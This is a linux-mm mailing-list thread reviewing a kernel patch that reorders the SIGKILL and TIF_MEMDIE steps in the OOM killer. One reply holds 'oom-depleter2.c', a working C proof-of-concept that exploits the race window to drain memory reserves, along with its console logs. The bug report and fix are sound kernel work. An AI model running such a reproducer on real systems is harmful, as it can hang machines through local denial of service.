[  157.334941]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.336684]     in-flight: 228:disk_events_workfn
[  157.338168] workqueue xfs-log/sda1: flags=0x14
[  157.339473]   pwq 7: cpus=3 node=0 flags=0x0 nice=-20 active=2/256
[  157.341255]     in-flight: 1369:xfs_log_worker
[  157.342674]     pending: xfs_buf_ioend_work
[  157.344066] pool 2: cpus=1 node=0 flags=0x0 nice=0 workers=3 idle: 43 14
[  157.346039] pool 7: cpus=3 node=0 flags=0x0 nice=-20 workers=2 manager: 27
[  185.044658] sysrq: SysRq : Show Memory
[  185.045975] Mem-Info:
[  185.046968] active_anon:423788 inactive_anon:2085 isolated_anon:0
[  185.046968]  active_file:0 inactive_file:1 isolated_file:0
[  185.046968]  unevictable:0 dirty:0 writeback:0 unstable:0
[  185.046968]  slab_reclaimable:1689 slab_unreclaimable:5401
[  185.046968]  mapped:391 shmem:2146 pagetables:2123 bounce:0
[  185.046968]  free:4 free_pcp:0 free_cma:0
[  185.056165] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes
[  185.066444] lowmem_reserve[]: 0 1731 1731 1731
[  185.068083] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  185.079186] lowmem_reserve[]: 0 0 0 0
[  185.080783] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[  185.083790] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB
[  185.087232] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  185.089572] 2147 total pagecache pages
[  185.091096] 0 pages in swap cache
[  185.092469] Swap cache stats: add 0, delete 0, find 0/0
[  185.094288] Free swap  = 0kB
[  185.095671] Total swap = 0kB
[  185.097075] 524157 pages RAM
[  185.098466] 0 pages HighMem/MovableOnly
[  185.100005] 76583 pages reserved
[  185.101435] 0 pages hwpoisoned
[  205.509157] sysrq: SysRq : Resetting
---------- console log start ----------
Complete log is at http://I-love.SAKURA.ne.jp/tmp/serial-20150731.txt.xz .

Thus, here is a SEPARATE PATCH WITH A JUSTIFICATION.
After applying this patch, I can no longer reproduce this problem.

----------------------------------------

>From 2945dffb8d602947800348d44d317bae152f890c Mon Sep 17 00:00:00 2001
From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Date: Fri, 31 Jul 2015 19:06:28 +0900
Subject: [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and
 sending SIGKILL.

It is observed that a multi-threaded program can deplete memory reserves
using time lag between the OOM killer sets TIF_MEMDIE and the OOM killer
sends SIGKILL. This is because a thread group leader who gets TIF_MEMDIE
received SIGKILL too lately when there is a lot of child threads sharing
the same memory due to doing a lot of printk() inside for_each_process()
loop which can take many seconds.

Before starting oom-depleter process:

    Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
    Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB

As of invoking the OOM killer:

    Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
    Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB

Between the thread group leader got TIF_MEMDIE and receives SIGKILL:

    Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
    Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB

The oom-depleter's thread group leader which got TIF_MEMDIE started
memset() in user space after the OOM killer set TIF_MEMDIE, and it
was free to abuse ALLOC_NO_WATERMARKS by TIF_MEMDIE for memset()
in user space until SIGKILL is delivered. If SIGKILL is delivered
before TIF_MEMDIE is set, the oom-depleter can terminate without
touching memory reserves.

Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
---
 mm/oom_kill.c | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 5249e7e..c0a5a69 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	/* Get a reference to safely compare mm after task_unlock(victim) */
 	mm = victim->mm;
 	atomic_inc(&mm->mm_users);
-	mark_oom_victim(victim);
 	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
 		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
 		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
 		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
 	task_unlock(victim);
+	/* Send SIGKILL before setting TIF_MEMDIE. */
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
+	task_lock(victim);
+	if (victim->mm)
+		mark_oom_victim(victim);
+	task_unlock(victim);
 
 	/*
 	 * Kill all user processes sharing victim->mm in other thread groups, if
@@ -586,7 +591,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 		}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mmput(mm);
 	put_task_struct(victim);
 }
-- 
1.8.3.1

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-23  7:19 [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL Tetsuo Handa
@ 2015-08-24  9:47 ` Michal Hocko
  2015-08-25 12:06   ` Tetsuo Handa
  2015-08-26 14:12 ` Michal Hocko
  2015-08-26 15:03 ` Tetsuo Handa
  2 siblings, 1 reply; 14+ messages in thread
From: Michal Hocko @ 2015-08-24  9:47 UTC (permalink / raw)
  To: Tetsuo Handa; +Cc: rientjes, hannes, linux-mm

On Sun 23-08-15 16:19:38, Tetsuo Handa wrote:
[...]
> I tried to reproducing what I worried at
> http://www.spinics.net/lists/linux-mm/msg82342.html . I confirmed that a
> local unprivileged user can consume all memory reserves using the time lag.

You were right!

> >From 2945dffb8d602947800348d44d317bae152f890c Mon Sep 17 00:00:00 2001
> From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
> Date: Fri, 31 Jul 2015 19:06:28 +0900
> Subject: [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and
>  sending SIGKILL.
> 
> It is observed that a multi-threaded program can deplete memory reserves
> using time lag between the OOM killer sets TIF_MEMDIE and the OOM killer
> sends SIGKILL. This is because a thread group leader who gets TIF_MEMDIE
> received SIGKILL too lately when there is a lot of child threads sharing
> the same memory due to doing a lot of printk() inside for_each_process()
> loop which can take many seconds.
> 
> Before starting oom-depleter process:
> 
>     Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
>     Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
> 
> As of invoking the OOM killer:
> 
>     Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
>     Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
> 
> Between the thread group leader got TIF_MEMDIE and receives SIGKILL:
> 
>     Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
>     Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
> 
> The oom-depleter's thread group leader which got TIF_MEMDIE started
> memset() in user space after the OOM killer set TIF_MEMDIE, and it
> was free to abuse ALLOC_NO_WATERMARKS by TIF_MEMDIE for memset()
> in user space until SIGKILL is delivered. If SIGKILL is delivered
> before TIF_MEMDIE is set, the oom-depleter can terminate without
> touching memory reserves.
> 
> Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
> ---
>  mm/oom_kill.c | 8 ++++++--
>  1 file changed, 6 insertions(+), 2 deletions(-)
> 
> diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> index 5249e7e..c0a5a69 100644
> --- a/mm/oom_kill.c
> +++ b/mm/oom_kill.c
> @@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	/* Get a reference to safely compare mm after task_unlock(victim) */
>  	mm = victim->mm;
>  	atomic_inc(&mm->mm_users);
> -	mark_oom_victim(victim);
>  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
>  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
>  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
>  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
>  	task_unlock(victim);
> +	/* Send SIGKILL before setting TIF_MEMDIE. */
> +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> +	task_lock(victim);
> +	if (victim->mm)
> +		mark_oom_victim(victim);
> +	task_unlock(victim);

Why cannot you simply move do_send_sig_info without touching
mark_oom_victim? Are you still able to trigger the issue if you just
kill before crawling through all the tasks sharing the mm?

The code would be easier then and the race window much smaller. If we
really needed to prevent from preemption then preempt_{enable,disable}
aournd the whole task_lock region + do_send_sig_info would be still
easier to follow than re-taking task_lock.

>  
>  	/*
>  	 * Kill all user processes sharing victim->mm in other thread groups, if
> @@ -586,7 +591,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  		}
>  	rcu_read_unlock();
>  
> -	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
>  	mmput(mm);
>  	put_task_struct(victim);
>  }
> -- 
> 1.8.3.1

-- 
Michal Hocko
SUSE Labs

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-24  9:47 ` Michal Hocko
@ 2015-08-25 12:06   ` Tetsuo Handa
  2015-08-25 14:17     ` Michal Hocko
  0 siblings, 1 reply; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-25 12:06 UTC (permalink / raw)
  To: mhocko; +Cc: rientjes, hannes, linux-mm

Michal Hocko wrote:
> > diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> > index 5249e7e..c0a5a69 100644
> > --- a/mm/oom_kill.c
> > +++ b/mm/oom_kill.c
> > @@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
> >  	/* Get a reference to safely compare mm after task_unlock(victim) */
> >  	mm = victim->mm;
> >  	atomic_inc(&mm->mm_users);
> > -	mark_oom_victim(victim);
> >  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
> >  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
> >  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
> >  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
> >  	task_unlock(victim);
> > +	/* Send SIGKILL before setting TIF_MEMDIE. */
> > +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> > +	task_lock(victim);
> > +	if (victim->mm)
> > +		mark_oom_victim(victim);
> > +	task_unlock(victim);
> 
> Why cannot you simply move do_send_sig_info without touching
> mark_oom_victim? Are you still able to trigger the issue if you just
> kill before crawling through all the tasks sharing the mm?

If you meant

diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 1ecc0bc..ea578fb 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -560,6 +560,7 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
                K(get_mm_counter(victim->mm, MM_ANONPAGES)),
                K(get_mm_counter(victim->mm, MM_FILEPAGES)));
        task_unlock(victim);
+       do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);

        /*
         * Kill all user processes sharing victim->mm in other thread groups, if
@@ -585,7 +586,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
                }
        rcu_read_unlock();

-       do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
        put_task_struct(victim);
 }
 #undef K

then yes I still can trigger the issue under very limited condition (i.e.
ran as root user for polling kernel messages with realtime priority, after
killing all processes using SysRq-i).

---------- oom-depleter2.c start ----------
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/klog.h>

static int zero_fd = -1;
static char *buf = NULL;
static unsigned long size = 0;

static int trigger(void *unused)
{
        {
                struct sched_param sp = { };
                sched_setscheduler(0, SCHED_IDLE, &sp);
        }
        read(zero_fd, buf, size); /* Will cause OOM due to overcommit */
        return 0;
}

int main(int argc, char *argv[])
{
        unsigned long i;
        zero_fd = open("/dev/zero", O_RDONLY);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        /* Let a child thread trigger the OOM killer. */
        clone(trigger, malloc(4096) + 4096, CLONE_SIGHAND | CLONE_VM, NULL);
        {
                struct sched_param sp = { 99 };
                sched_setscheduler(0, SCHED_FIFO, &sp);
        }
        /* Wait until the OOM killer messages appear. */
        while (1) {
                i = klogctl(2, buf, size - 1);
                if (i > 0) {
                        buf[i] = '\0';
                        if (strstr(buf, "Killed process "))
                                break;
                }
        }
        /* Deplete all memory reserve. */
        for (i = size; i; i -= 4096)
                buf[i - 1] = 1;
        return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter2.c start ----------

# taskset -c 0 ./oom-depleter2

(Intentionally running two threads with different priority on the same CPU
 in order to increase possibility of invoking preemption.)

---------- console log start ----------
[   47.069197] oom-depleter2 invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   47.070651] oom-depleter2 cpuset=/ mems_allowed=0
[   47.072982] CPU: 0 PID: 3851 Comm: oom-depleter2 Tainted: G        W       4.2.0-rc7-next-20150824+ #85
[   47.074683] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   47.076583]  0000000000000000 00000000115c5c6c ffff88007ca2f8c8 ffffffff81313283
[   47.078014]  ffff88007890f2c0 ffff88007ca2f970 ffffffff8117ff7d 0000000000000000
[   47.079438]  0000000000000202 0000000000000018 0000000000000001 0000000000000202
[   47.080856] Call Trace:
[   47.081335]  [<ffffffff81313283>] dump_stack+0x4b/0x78
[   47.082233]  [<ffffffff8117ff7d>] dump_header+0x82/0x232
[   47.083234]  [<ffffffff81627645>] ? _raw_spin_unlock_irqrestore+0x25/0x30
[   47.084447]  [<ffffffff810fe041>] ? delayacct_end+0x51/0x60
[   47.085483]  [<ffffffff81114fd2>] oom_kill_process+0x372/0x3c0
[   47.086551]  [<ffffffff81071cd0>] ? has_ns_capability_noaudit+0x30/0x40
[   47.087715]  [<ffffffff81071cf2>] ? has_capability_noaudit+0x12/0x20
[   47.088874]  [<ffffffff8111528d>] out_of_memory+0x21d/0x4a0
[   47.089915]  [<ffffffff8111a774>] __alloc_pages_nodemask+0x904/0x930
[   47.091010]  [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0
[   47.092042]  [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950
[   47.093076]  [<ffffffff816287cd>] ? retint_kernel+0x1b/0x1d
[   47.094108]  [<ffffffff81628837>] ? native_iret+0x7/0x7
[   47.095108]  [<ffffffff810565bb>] __do_page_fault+0x18b/0x440
[   47.096109]  [<ffffffff810568a0>] do_page_fault+0x30/0x80
[   47.097052]  [<ffffffff816297e8>] page_fault+0x28/0x30
[   47.098544]  [<ffffffff81320ae0>] ? __clear_user+0x20/0x50
[   47.099651]  [<ffffffff813254b8>] iov_iter_zero+0x68/0x250
[   47.100642]  [<ffffffff810920f6>] ? sched_clock_cpu+0x86/0xc0
[   47.101701]  [<ffffffff813f9018>] read_iter_zero+0x38/0xa0
[   47.102754]  [<ffffffff81183ec4>] __vfs_read+0xc4/0xf0
[   47.103684]  [<ffffffff81184639>] vfs_read+0x79/0x120
[   47.104630]  [<ffffffff81185350>] SyS_read+0x50/0xc0
[   47.105503]  [<ffffffff8108bd9c>] ? do_sched_setscheduler+0x7c/0xb0
[   47.106637]  [<ffffffff81627cae>] entry_SYSCALL_64_fastpath+0x12/0x71
[   47.109307] Mem-Info:
[   47.109801] active_anon:416244 inactive_anon:3737 isolated_anon:0
[   47.109801]  active_file:0 inactive_file:474 isolated_file:0
[   47.109801]  unevictable:0 dirty:0 writeback:0 unstable:0
[   47.109801]  slab_reclaimable:1114 slab_unreclaimable:3896
[   47.109801]  mapped:96 shmem:4188 pagetables:1014 bounce:0
[   47.109801]  free:12368 free_pcp:183 free_cma:0
[   47.118364] Node 0 DMA free:7316kB min:400kB low:500kB high:600kB active_anon:7056kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes
[   47.129538] lowmem_reserve[]: 0 1731 1731 1731
[   47.131230] Node 0 DMA32 free:44016kB min:44652kB low:55812kB high:66976kB active_anon:1657920kB inactive_anon:14716kB active_file:0kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:796kB local_pcp:56kB free_cma:0kB writeback_tmp:0kB pages_scanned:124 all_unreclaimable? no
[   47.143246] lowmem_reserve[]: 0 0 0 0
[   47.145175] Node 0 DMA: 17*4kB (UE) 9*8kB (UE) 9*16kB (UEM) 1*32kB (M) 1*64kB (M) 2*128kB (UE) 2*256kB (EM) 2*512kB (EM) 1*1024kB (E) 2*2048kB (EM) 0*4096kB = 7292kB
[   47.152896] Node 0 DMA32: 1009*4kB (UEM) 617*8kB (UEM) 268*16kB (UEM) 118*32kB (UEM) 43*64kB (UEM) 13*128kB (UEM) 11*256kB (UEM) 10*512kB (UM) 12*1024kB (UM) 1*2048kB (U) 0*4096kB = 43724kB
[   47.161214] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   47.163987] 4649 total pagecache pages
[   47.166121] 0 pages in swap cache
[   47.168500] Swap cache stats: add 0, delete 0, find 0/0
[   47.170238] Free swap  = 0kB
[   47.171764] Total swap = 0kB
[   47.173270] 524157 pages RAM
[   47.174520] 0 pages HighMem/MovableOnly
[   47.175930] 76617 pages reserved
[   47.178043] 0 pages hwpoisoned
[   47.179584] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
[   47.182065] [ 3820]     0  3820    10756      168      24       3        0             0 systemd-journal
[   47.184504] [ 3823]     0  3823    10262      101      23       3        0         -1000 systemd-udevd
[   47.186847] [ 3824]     0  3824    27503       33      12       3        0             0 agetty
[   47.189291] [ 3825]     0  3825     8673       84      23       3        0             0 systemd-logind
[   47.191691] [ 3826]     0  3826    21787      154      48       3        0             0 login
[   47.193959] [ 3828]    81  3828     6609       82      18       3        0          -900 dbus-daemon
[   47.196297] [ 3831]     0  3831    28878       93      15       3        0             0 bash
[   47.198573] [ 3850]     0  3850   541715   414661     820       6        0             0 oom-depleter2
[   47.200915] [ 3851]     0  3851   541715   414661     820       6        0             0 oom-depleter2
[   47.203410] Out of memory: Kill process 3850 (oom-depleter2) score 900 or sacrifice child
[   47.205695] Killed process 3850 (oom-depleter2) total-vm:2166860kB, anon-rss:1658644kB, file-rss:0kB
[   47.257871] oom-depleter2: page allocation failure: order:0, mode:0x280da
[   47.260006] CPU: 0 PID: 3850 Comm: oom-depleter2 Tainted: G        W       4.2.0-rc7-next-20150824+ #85
[   47.262473] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   47.265184]  0000000000000000 000000000f39672f ffff880036febbe0 ffffffff81313283
[   47.267511]  00000000000280da ffff880036febc70 ffffffff81116e04 0000000000000000
[   47.269815]  ffffffff00000000 ffff88007fc19730 ffff880000000004 ffffffff810a30cf
[   47.272019] Call Trace:
[   47.273283]  [<ffffffff81313283>] dump_stack+0x4b/0x78
[   47.275081]  [<ffffffff81116e04>] warn_alloc_failed+0xf4/0x150
[   47.276962]  [<ffffffff810a30cf>] ? __wake_up+0x3f/0x50
[   47.278700]  [<ffffffff8111a0bc>] __alloc_pages_nodemask+0x24c/0x930
[   47.280664]  [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0
[   47.282422]  [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950
[   47.284240]  [<ffffffff810565bb>] __do_page_fault+0x18b/0x440
[   47.286036]  [<ffffffff810568a0>] do_page_fault+0x30/0x80
[   47.287693]  [<ffffffff816297e8>] page_fault+0x28/0x30
[   47.289358] Mem-Info:
[   47.290494] active_anon:429031 inactive_anon:3737 isolated_anon:0
[   47.290494]  active_file:0 inactive_file:0 isolated_file:0
[   47.290494]  unevictable:0 dirty:0 writeback:0 unstable:0
[   47.290494]  slab_reclaimable:1114 slab_unreclaimable:3896
[   47.290494]  mapped:96 shmem:4188 pagetables:1014 bounce:0
[   47.290494]  free:0 free_pcp:180 free_cma:0
[   47.299662] Node 0 DMA free:8kB min:400kB low:500kB high:600kB active_anon:14308kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes
[   47.309430] lowmem_reserve[]: 0 1731 1731 1731
[   47.311000] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1701816kB inactive_anon:14716kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:720kB local_pcp:24kB free_cma:0kB writeback_tmp:0kB pages_scanned:5584 all_unreclaimable? yes
[   47.321601] lowmem_reserve[]: 0 0 0 0
[   47.323166] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   47.326070] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   47.329018] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   47.331385] 4189 total pagecache pages
[   47.332896] 0 pages in swap cache
[   47.334262] Swap cache stats: add 0, delete 0, find 0/0
[   47.335990] Free swap  = 0kB
[   47.337390] Total swap = 0kB
[   47.338656] 524157 pages RAM
[   47.339964] 0 pages HighMem/MovableOnly
[   47.341464] 76617 pages reserved
[   47.342808] 0 pages hwpoisoned
(...snipped...)
[   93.082032] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   93.082034] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
---------- console log end ----------
Complete log is at http://I-love.SAKURA.ne.jp/tmp/serial-20150825.txt.xz .

> 
> The code would be easier then and the race window much smaller. If we
> really needed to prevent from preemption then preempt_{enable,disable}
> aournd the whole task_lock region + do_send_sig_info would be still
> easier to follow than re-taking task_lock.

What's wrong with re-taking task_lock? It seems to me that re-taking
task_lock is more straightforward and easier to follow.

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-25 12:06   ` Tetsuo Handa
@ 2015-08-25 14:17     ` Michal Hocko
  2015-08-25 14:37       ` Tetsuo Handa
  0 siblings, 1 reply; 14+ messages in thread
From: Michal Hocko @ 2015-08-25 14:17 UTC (permalink / raw)
  To: Tetsuo Handa; +Cc: rientjes, hannes, linux-mm

On Tue 25-08-15 21:06:36, Tetsuo Handa wrote:
> Michal Hocko wrote:
> > > diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> > > index 5249e7e..c0a5a69 100644
> > > --- a/mm/oom_kill.c
> > > +++ b/mm/oom_kill.c
> > > @@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
> > >  	/* Get a reference to safely compare mm after task_unlock(victim) */
> > >  	mm = victim->mm;
> > >  	atomic_inc(&mm->mm_users);
> > > -	mark_oom_victim(victim);
> > >  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
> > >  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
> > >  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
> > >  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
> > >  	task_unlock(victim);
> > > +	/* Send SIGKILL before setting TIF_MEMDIE. */
> > > +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> > > +	task_lock(victim);
> > > +	if (victim->mm)
> > > +		mark_oom_victim(victim);
> > > +	task_unlock(victim);
> > 
> > Why cannot you simply move do_send_sig_info without touching
> > mark_oom_victim? Are you still able to trigger the issue if you just
> > kill before crawling through all the tasks sharing the mm?
> 
> If you meant
> 
> diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> index 1ecc0bc..ea578fb 100644
> --- a/mm/oom_kill.c
> +++ b/mm/oom_kill.c
